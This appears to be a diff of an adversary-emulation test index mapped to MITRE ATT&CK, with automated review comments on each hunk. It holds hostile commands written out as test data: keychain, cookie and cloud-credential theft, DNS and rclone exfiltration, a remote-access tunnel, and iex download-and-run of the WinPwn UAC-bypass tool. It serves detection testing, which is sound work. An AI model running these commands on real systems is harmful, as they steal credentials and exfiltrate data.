]\nthen mkdir -p $(dirname #{payload_path}) \n PKG_TYPE=$(command
-v apt >/dev/null && echo \"deb\" || echo \"rpm\")\n curl -L \"#{artifact_base_url}?build=#{artifact_build}&os=linux-${PKG_TYPE}-${ARCH_SUFFIX}\"
-o \"#{payload_path}/code.${PKG_TYPE}\"\n (which apt && apt install -y
\"#{payload_path}/code.${PKG_TYPE}\") || (which yum && yum install -y \"#{payload_path}/code.${PKG_TYPE}\")\n
\ rm \"#{payload_path}/code.${PKG_TYPE}\"\nfi\n"
- description: 'Login to VSCode Dev tunnels
'
prereq_command: 'code tunnel user show | grep -q "not logged in" && exit 1
|| exit 0
'
get_prereq_command: 'echo "Login to code tunnel using the following command:
code tunnel user login"
'
executor:
command: 'nohup code tunnel --accept-server-license-terms #{additional_args}
>/dev/null 2>&1 &
'
cleanup_command: |
pkill -9 tunnel
code tunnel unregister
code tunnel user logout
name: sh
T1071.003:
technique:
modified: '2024-04-16T12:28:59.928Z'
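Review bot: the devtunnel test's `download_url` default is the `linux-x64` build while `supported_platforms` lists `macos`, and unlike the VSCode test there is no `uname`-based selection, so on macOS the prerequisite downloads a binary that cannot run; either drop macos from the list or choose the URL by OS and architecture as the second test does. In the VSCode cleanup, `pkill -9 tunnel` treats `tunnel` as a regex against process names and so kills any process whose name contains that string; prefer `pkill -f 'code tunnel'` or capture the PID of the backgrounded `nohup code tunnel` and kill that. The phrase "Dev Tunnels enables insiders as well as threat actors to expose local ports" also reads awkwardly; "Dev Tunnels lets insiders and threat actors expose local ports" is clearer.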
@@ -45543,7 +45625,31 @@ collection:
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1005
atomic_tests: []
atomic_tests:
- name: Copy Apple Notes database files using AppleScript
auto_generated_guid: cfb6d400-a269-4c06-a347-6d88d584d5f7
description: 'This command will copy Apple Notes database files using AppleScript
as seen in Atomic Stealer.
'
supported_platforms:
- macos
input_arguments:
destination_path:
description: Specify the path to copy the database files into.
type: path
default: "/private/tmp"
executor:
command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to
home folder as text) & "Library:Group Containers:group.com.apple.notes:"'
-e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file
"NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"}
of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile
to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
cleanup_command: rm "#{destination_path}/NoteStore.sqlite*"
name: sh
elevation_required: false
T1560.002:
technique:
x_mitre_platforms:
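Review bot: the cleanup `rm "#{destination_path}/NoteStore.sqlite*"` puts the `*` inside the double quotes, so the shell does not expand it and `rm` looks for a file literally named `NoteStore.sqlite*`; the three copied files (`NoteStore.sqlite`, `NoteStore.sqlite-shm`, `NoteStore.sqlite-wal`) are left in `/private/tmp`. Move the glob outside the quotes: `rm "#{destination_path}"/NoteStore.sqlite*`.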
@@ -49460,6 +49566,28 @@ credential-access:
cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
name: bash
elevation_required: false
- name: Copy Safari BinaryCookies files using AppleScript
auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
description: 'This command will copy Safari BinaryCookies files using AppleScript
as seen in Atomic Stealer.
'
supported_platforms:
- macos
input_arguments:
destination_path:
description: Specify the path to copy the BinaryCookies file into.
type: path
default: "/private/tmp"
executor:
command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library
folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")'
-e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder
destinationFolderPath with replacing' -e 'end tell'
cleanup_command: rm "#{destination_path}/Cookies.binarycookies"
name: sh
elevation_required: false
T1003.002:
technique:
modified: '2024-10-15T16:40:52.174Z'
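Review bot: `~/Library/Containers/com.apple.Safari/Data/Library/Cookies` is TCC-protected, so duplicating `Cookies.binarycookies` through Finder only works when the calling terminal has Full Disk Access or the user approves the automation prompt; without that the `duplicate` fails or the test hangs on the prompt. State that prerequisite in the description or as a dependency so a failed run is not mistaken for the technique being blocked by a control.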
@@ -49827,6 +49955,26 @@ credential-access:
'
name: sh
elevation_required: false
- name: Copy Keychain using cat utility
auto_generated_guid: 5c32102a-c508-49d3-978f-288f8a9f6617
description: 'This command will copy the keychain using the cat utility in a
manner similar to Atomic Stealer.
'
supported_platforms:
- macos
input_arguments:
keychain_export:
description: Specify the path to copy they keychain into.
type: path
default: "/tmp/keychain"
executor:
command: 'cat ~/Library/Keychains/login.keychain-db > #{keychain_export}
'
cleanup_command: 'rm #{keychain_export}'
name: sh
elevation_required: false
T1003.004:
technique:
modified: '2024-08-13T15:49:17.591Z'
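Review bot: typo in the `keychain_export` description, "copy they keychain into" should be "copy the keychain into". `elevation_required: false` is correct, since `login.keychain-db` is owned and readable by the logged-in user.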
@@ -52222,7 +52370,7 @@ credential-access:
identifier: T1552.001
atomic_tests:
- name: Find AWS credentials
auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
auto_generated_guid: 37807632-d3da-442e-8c2e-00f44928ff8f
description: 'Find local AWS credentials from file, defaults to using / as the
look path.
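Review bot: this hunk replaces the `auto_generated_guid` of an existing test (`2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17` becomes `37807632-d3da-442e-8c2e-00f44928ff8f`). The GUID is the stable key that detection content, coverage mappings and `Invoke-AtomicTest -TestGuids` runs use to reference a test, so changing it silently breaks those references; unless the old GUID was a duplicate, keep it and change only the command.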
@@ -52236,7 +52384,7 @@ credential-access:
type: string
default: "/"
executor:
command: 'find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
command: 'find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
'
name: sh
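Review bot: with the default `file_path` of `/`, the new command searches only `//.aws`, which is not where per-user credentials live (`~/.aws/credentials`), whereas the old `-path "*/.aws/*"` form walked the whole tree; the description still promises "defaults to using / as the look path". Either change the default to `$HOME` and update the description, or keep the recursive form.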
@@ -52290,6 +52438,65 @@ credential-access:
echo $file ; cat $file ; done
'
- name: Find Azure credentials
auto_generated_guid: a8f6148d-478a-4f43-bc62-5efee9f931a4
description: 'Find local Azure credentials from file, defaults to using / as
the look path.
'
supported_platforms:
- macos
- linux
input_arguments:
file_path:
description: Path to search
type: string
default: "/"
executor:
command: 'find #{file_path}/.azure -name "msal_token_cache.json" -o -name
"accessTokens.json" -type f 2>/dev/null
'
name: sh
- name: Find GCP credentials
auto_generated_guid: aa12eb29-2dbb-414e-8b20-33d34af93543
description: 'Find local Google Cloud Platform credentials from file, defaults
to using / as the look path.
'
supported_platforms:
- macos
- linux
input_arguments:
file_path:
description: Path to search
type: string
default: "/"
executor:
command: 'find #{file_path}/.config/gcloud -name "credentials.db" -o -name
"access_tokens.db" -type f 2>/dev/null
'
name: sh
- name: Find OCI credentials
auto_generated_guid: 9d9c22c9-fa97-4008-a204-478cf68c40af
description: 'Find local Oracle cloud credentials from file, defaults to using
/ as the look path.
'
supported_platforms:
- macos
- linux
input_arguments:
file_path:
description: Path to search
type: string
default: "/"
executor:
command: 'find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
'
name: sh
T1606.001:
technique:
modified: '2023-09-19T21:25:10.511Z'
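Review bot: in the Azure and GCP tests the expression `-name A -o -name B -type f` is parsed by `find` as `-name A -o ( -name B -a -type f )`, so `-type f` only constrains the second name; group the alternatives, e.g. `\( -name "msal_token_cache.json" -o -name "accessTokens.json" \) -type f`. All three tests also inherit the default-path problem from the AWS hunk: with `/` as the default, `//.azure`, `//.config/gcloud` and `//.oci/sessions` are searched instead of the user's home directory, while the descriptions still say "/ as the look path".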
@@ -54811,7 +55018,7 @@ discovery:
executor:
name: bash
elevation_required: false
command: 'ping -n 4 #{ping_target}
command: 'ping -c 4 #{ping_target}
'
T1069:
@@ -55403,7 +55610,7 @@ discovery:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.001
atomic_tests:
- name: Detect Virtualization Environment (MacOS)
- name: Detect Virtualization Environment via ioreg
auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09
description: 'ioreg contains registry entries for all the device drivers in
the system. If it''s a virtual machine, one of the device manufacturer will
@@ -55419,6 +55626,49 @@ discovery:
''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
detected''; fi;
'
- name: Detect Virtualization Environment using sysctl (hw.model)
auto_generated_guid: 6beae646-eb4c-4730-95be-691a4094408c
description: |
sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware
but will return the hypervisor name (VMware7,0).
Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(sysctl -n hw.model | grep -v ''Mac'')" != "" ]; then echo
''Virtualization Environment detected''; fi;
'
- name: Check if System Integrity Protection is enabled
auto_generated_guid: 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945
description: "The latest versions of macOS have the System Integrity Protection
feature (SIP). If a sandbox uses a non-signed \nkernel extension for monitoring
purposes the, SIP feature must be disabled to load this kind of kernel extension.\nMalware
may check if the SIP is enabled.\nReference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip\n"
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(csrutil status | grep -v ''enabled'')" != "" ]; then echo
''Possible Virtualization Environment detected''; fi;
'
- name: Detect Virtualization Environment using system_profiler
auto_generated_guid: e04d2e89-de15-4d90-92f9-a335c7337f0f
description: "system_profiler provides system hardware and software configuration
and the Model Identifier should provide the value similar to (sysctl -n hw.model).
\nWe should be able to find whether virtualization is enabled by checking
whether the Model Identifier does not contain \"Mac\".\n"
supported_platforms:
- macos
executor:
name: sh
command: 'if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier"
| grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected'';
fi;
'
T1069.002:
technique:
@@ -58299,6 +58549,41 @@ discovery:
nc -nv #{host} #{port}
name: sh
elevation_required: true
- name: Port Scan using nmap (Port range)
auto_generated_guid: 0d5a2b03-3a26-45e4-96ae-89485b4d1f97
description: 'Scan multiple ports to check for listening ports with nmap
'
supported_platforms:
- linux
- macos
input_arguments:
host:
description: Host(s) to scan.
type: string
default: 127.0.0.1
port_range:
description: Port range(s) to scan.
type: string
default: 0-65535
dependency_executor_name: sh
dependencies:
- description: 'Check if nmap command exists on the machine
'
prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
fi;
'
get_prereq_command: "(which yum && yum -y install epel-release nmap)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which
pkg && pkg install -y nmap)||(which brew && brew install nmap)\n"
executor:
command: 'nmap -Pn -sV -p #{port_range} #{host}
'
elevation_required: true
name: sh
T1518:
technique:
modified: '2024-04-16T00:16:06.689Z'
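Review bot: the default `port_range` of `0-65535` together with `-sV` runs a version scan of every port, which is slow even against `127.0.0.1`; consider a smaller default such as `1-1024` or adding `-T4`, and mention in the description that `-sV` is what makes the run long. `elevation_required: true` is appropriate since nmap switches to a SYN scan when run as root.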
@@ -63391,7 +63676,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -63409,7 +63694,41 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
identifier: T1595.003
atomic_tests:
- name: Web Server Wordlist Scan
auto_generated_guid: 89a83c3e-0b39-4c80-99f5-c2aa084098bd
description: 'This test will scan a target system with a wordlist of common
directories and file paths.
'
supported_platforms:
- windows
- linux
- macos
input_arguments:
target:
description: The target system to scan
type: string
default: http://localhost
wordlist:
description: The wordlist to use for scanning
type: path
default: PathToAtomicsFolder/T1595.003/src/wordlist.txt
request_timeout:
description: The timeout for each request (in seconds)
type: integer
default: 5
output_file:
description: File to output results to
type: string
default: "$env:TMPDIR/wordlist_scan.txt"
executor:
command: |
Import-Module "PathToAtomicsFolder/T1595.003/src/WebServerScan.ps1"
Invoke-WordlistScan -Target "#{target}" -Wordlist "#{wordlist}" -Timeout "#{request_timeout}" -OutputFile "#{output_file}"
Write-Host "Scan complete. Results saved to: #{output_file}"
name: powershell
T1591.004:
technique:
x_mitre_platforms:
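Review bot: `output_file` defaults to `$env:TMPDIR/wordlist_scan.txt`, but `TMPDIR` is a macOS/Linux variable that is normally unset on Windows, which is listed under `supported_platforms`; there the default expands to `/wordlist_scan.txt` and the write fails unless the user can write to the drive root. Use `[System.IO.Path]::GetTempPath()` in the executor or a per-platform default (`$env:TEMP` on Windows).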
@@ -68743,6 +69062,45 @@ exfiltration:
'
name: sh
- name: Exfiltrate Data using DNS Queries via dig
auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
description: "This test demonstrates how an attacker can exfiltrate sensitive
information by encoding it as a subdomain (using base64 encoding) and \nmaking
DNS queries via the dig command to a controlled DNS server.\n"
supported_platforms:
- macos
- linux
input_arguments:
dns_port:
type: integer
default: '53'
description: Attacker's DNS server port
attacker_dns_server:
type: string
default: 8.8.8.8
description: Attacker's DNS server address
secret_info:
type: string
default: this is a secret info
description: secret info that will be exfiltirated
dependency_executor_name: bash
dependencies:
- description: dig command
prereq_command: which dig
get_prereq_command: 'which apt && sudo apt update && sudo apt install -y bind9-dnsutils
|| which yum && sudo yum install -y bind-utils || which dnf && sudo dnf
install -y bind-utils || which apk && sudo apk add bind-tools || which pkg
&& sudo pkg update && sudo pkg install -y bind-tools || which brew && brew
update && brew install --quiet bind
'
executor:
command: 'dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}"
| base64).google.com
'
name: bash
elevation_required: false
T1052.001:
technique:
x_mitre_platforms:
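Review bot: the default `attacker_dns_server` is `8.8.8.8` and the query goes to `<base64>.google.com`, so a run with defaults sends the (trivially decodable) `secret_info` to Google rather than to a "controlled DNS server" as the description says; default to a placeholder that forces the operator to set a server they own, or at least state in the description where the query is sent. GNU `base64` on Linux also wraps output at 76 characters and emits `=`, `+` and `/`, none of which are valid hostname characters, so longer secrets produce a malformed label. Typo in the `secret_info` description: "exfiltirated".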
@@ -68885,7 +69243,133 @@ exfiltration:
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1567.002
atomic_tests: []
atomic_tests:
- name: Exfiltrate data with rclone to cloud Storage - AWS S3
auto_generated_guid: a4b74723-5cee-4300-91c3-5e34166909b4
description: |
This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3)
See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
supported_platforms:
- linux
- macos
input_arguments:
rclone_path:
description: Directory of rclone.exe
type: path
default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*/
exfil_directory:
description: Directory to exfiltrate
type: string
default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/
terraform_path:
description: Directory of terraform
type: path
default: PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*
aws_access_key:
description: AWS Access Key
type: string
default: ''
aws_secret_key:
description: AWS Secret Key
type: string
default: ''
aws_region:
description: AWS Region
type: string
default: us-east-1
aws_profile:
description: AWS Profile
type: string
default: default
dependency_executor_name: powershell
dependencies:
- description: 'rclone must exist at (#{rclone_path})
'
prereq_command: 'if (Test-Path "#{rclone_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
$arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
$operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
if ($operatingSystem -match "darwin") {
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-osx-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
} elseif ($operatingSystem -match "linux") {
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-linux-$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/rclone.zip"
}
Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/rclone.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/" -force
- description: terraform must exist at (#{terraform_path})
prereq_command: 'if (Test-Path "#{terraform_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/" -ErrorAction Ignore -Force | Out-Null
$arch = ([System.Runtime.InteropServices.RuntimeInformation]::OSArchitecture).ToString().ToLower()
$operatingSystem = ([System.Runtime.InteropServices.RuntimeInformation]::OSDescription).ToString().ToLower()
if ($operatingSystem -match "darwin") {
Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_darwin_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
} elseif ($operatingSystem -match "linux") {
Invoke-WebRequest "https://releases.hashicorp.com/terraform/1.10.5/terraform_1.10.5_linux_$arch.zip" -OutFile "PathToAtomicsFolder/../ExternalPayloads/terraform.zip"
}
Expand-archive -path "PathToAtomicsFolder/../ExternalPayloads/terraform.zip" -DestinationPath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v1.10.5/" -force
- description: 'Must provide a valid directory or file path to exfiltrate to
AWS S3
'
prereq_command: 'if (Test-Path "#{exfil_directory}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data" -ErrorAction Ignore -Force | Out-Null
foreach($fileSuffix in 1..10) {
Set-Content "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/test$fileSuffix.txt" "This is a test file"
}
executor:
command: |
Write-Host "Deploying AWS infrastructure... " -NoNewLine
$awsAccessKey = "#{aws_access_key}"
$awsSecretKey = "#{aws_secret_key}"
cd PathToAtomicsFolder/T1567.002/src/
if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
$env:AWS_PROFILE = "#{aws_profile}"
} else {
$env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
$env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
}
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform init
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform apply -var "aws_region=#{aws_region}" -auto-approve
Write-Host "Done!"
Write-Host "Generating rclone config... " -NoNewLine
$config = @"
[exfils3]
type = s3
provider = AWS
env_auth = true
region = #{aws_region}
"@
$config | Out-File -FilePath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf" -Encoding ascii
Write-Host "Done!"
Write-Host "Exfiltrating data... " -NoNewLine
$bucket = "$(PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform output bucket)".Replace("`"","")
cd PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*
$null = ./rclone copy --max-size 1700k "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/" exfils3:$bucket --config "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf"
Write-Host "Done!"
cleanup_command: |
Write-Host "Destroying AWS infrastructure... " -NoNewLine
$awsAccessKey = "#{aws_access_key}"
$awsSecretKey = "#{aws_secret_key}"
cd PathToAtomicsFolder/T1567.002/src/
if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
$env:AWS_PROFILE = "#{aws_profile}"
} else {
$env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
$env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
}
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform destroy -var "aws_region=#{aws_region}" -auto-approve
Write-Host "Done!"
name: powershell
elevation_required: false
T1030:
technique:
x_mitre_platforms:
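Review bot: the `rclone_path`, `terraform_path` and `exfil_directory` input arguments are declared but never used; the executor and cleanup hard-code the `PathToAtomicsFolder/../ExternalPayloads/T1567.002/...` paths (e.g. `rclone copy ... "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/"` instead of `"#{exfil_directory}"`), so overriding them has no effect. Either wire them through or drop them. Also `rclone_path` is described as "Directory of rclone.exe" on a linux/macos test, `--max-size 1700k` is undocumented, and the get_prereq_command pins `terraform-v1.10.5` while the executor resolves it through the `terraform-v*` glob, which picks an arbitrary directory if more than one version is ever extracted.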
+17 -13
@@ -9410,11 +9410,11 @@ defense-evasion:
username:
description: office-365 username
type: string
default:
default:
password:
description: office-365 password
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'ExchangeOnlineManagement PowerShell module must be installed
@@ -11698,11 +11698,11 @@ defense-evasion:
username:
description: office-365 username
type: string
default:
default:
password:
description: office-365 password
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'ExchangeOnlineManagement PowerShell module must be installed
@@ -25576,7 +25576,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -25628,6 +25628,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.010
atomic_tests: []
T1059.009:
technique:
@@ -26966,6 +26967,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1651
atomic_tests: []
T1059.005:
technique:
@@ -27141,6 +27143,7 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1648
atomic_tests: []
T1204.001:
technique:
@@ -41363,11 +41366,11 @@ collection:
username:
description: office-365 username
type: string
default:
default:
password:
description: office-365 password
type: string
default:
default:
rule_name:
description: email rule name
type: string
@@ -41646,23 +41649,23 @@ collection:
and Application.ReadWrite.All Scope (eg, Global Administrator Role) and
sign-in method is password
type: string
default:
default:
password:
description: Entra user password
type: string
default:
default:
1st_target_mailbox:
description: office-365 target_email_address
type: string
default:
default:
2nd_target_mailbox:
description: office-365 target_email_address
type: string
default:
default:
3rd_target_mailbox:
description: office-365 target_email_address
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft Graph PowerShell SDK must be installed.
@@ -57070,7 +57073,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -57088,6 +57091,7 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1595.003
atomic_tests: []
T1591.004:
technique:
+6 -2
@@ -25395,7 +25395,7 @@ execution:
T1059.010:
technique:
modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
@@ -25447,6 +25447,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.010
atomic_tests: []
T1059.009:
technique:
@@ -26785,6 +26786,7 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1651
atomic_tests: []
T1059.005:
technique:
@@ -26960,6 +26962,7 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
identifier: T1648
atomic_tests: []
T1204.001:
technique:
@@ -56700,7 +56703,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -56718,6 +56721,7 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1595.003
atomic_tests: []
T1591.004:
technique:
+925 -138
@@ -771,7 +771,7 @@ defense-evasion:
default: "'%windir%\\System32\\calc.exe'"
executor:
command: rundll32.exe zipfldr.dll,RouteTheCall "#{exe_to_launch}"
cleanup_command:
cleanup_command:
name: powershell
elevation_required: false
T1027.009:
@@ -2401,7 +2401,6 @@ defense-evasion:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
name: powershell
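Review bot: the removed `$S3cur3Th1sSh1t_repo` assignment was never referenced by the `iex(...)` line that follows it, so dropping it changes nothing functionally, and the download stays pinned to commit 121dcee26a7aca368821563cbe92b2b5638c5773, which is what you want for reproducibility. The same one-line deletion is repeated in every other WinPwn-based test in this index, so it is enough to confirm the index was regenerated rather than hand-edited in each place.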
@@ -2412,7 +2411,6 @@ defense-evasion:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
name: powershell
@@ -2423,7 +2421,6 @@ defense-evasion:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
name: powershell
@@ -5188,6 +5185,36 @@ defense-evasion:
'
name: command_prompt
elevation_required: true
- name: SubInAcl Execution
auto_generated_guid: a8568b10-9ab9-4140-a523-1c72e0176924
description: This test simulates an adversary executing the Windows Resource
kit utility SubInAcl. This utility was abused by adversaries in the past in
order to modify access permissions. Upon execution, a process creation log
should be generated indicating successful execution.
supported_platforms:
- windows
input_arguments:
SubInAclDownloadPath:
type: string
default: https://web.archive.org/web/20120528222424if_/http://download.microsoft.com/download/1/7/d/17d82b72-bc6a-4dc8-bfaa-98b37b22b367/subinacl.msi
description: Download URL for SubInAcl
dependency_executor_name: powershell
dependencies:
- description: 'Download subinacl
'
prereq_command: 'if (Test-Path "Test-Path C:\Program Files (x86)\Windows Resource
Kits\Tools\subinacl.exe") {exit 0} else {exit 1}
'
get_prereq_command: |-
New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory | Out-Null
Invoke-WebRequest #{SubInAclDownloadPath} -OutFile C:\Users\Public\SubInAcl\SubInAcl.msi
msiexec.exe /i "C:\Users\Public\SubInAcl\SubInAcl.msi" /qn
executor:
command: '"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"'
name: command_prompt
elevation_required: true
T1574.014:
technique:
modified: '2024-04-28T15:44:25.342Z'
